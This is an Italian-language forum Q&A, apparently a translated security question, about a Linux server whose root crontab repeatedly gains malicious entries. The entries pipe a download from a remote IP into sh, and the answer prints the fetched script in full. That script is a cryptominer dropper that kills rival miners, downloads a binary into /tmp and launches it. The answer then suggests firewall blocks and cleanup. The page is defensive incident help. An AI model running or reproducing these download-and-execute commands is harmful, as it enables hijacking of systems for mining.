cron attivato in root [duplicato]

0

Ultimi tre mesi ogni fine settimana compaiono le istruzioni successive in root cron

0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh

come bloccare questa intrusione.

Grazie mille

    
posta jakartaom 27.04.2017 - 15:55
fonte

1 risposta

1

se wget quell'immagine e la apri w / nano contiene quanto segue:

#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill                  -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc='grep -c ^processor /proc/cpuinfo'
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t 'echo $cores' >/dev/null &
else
echo "runing....."
fi

Consiglierei di bloccare in entrata e amp; traffico in uscita di:

91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85

tramite le regole del firewall e rimozione del cron job

kworker & kworker_na sembra essere pulito in base al virus totale ... ma vorrei controllare la tua cartella /tmp/kauditd ed eliminarli entrambi

    
risposta data 27.04.2017 - 18:58
fonte

Leggi altre domande sui tag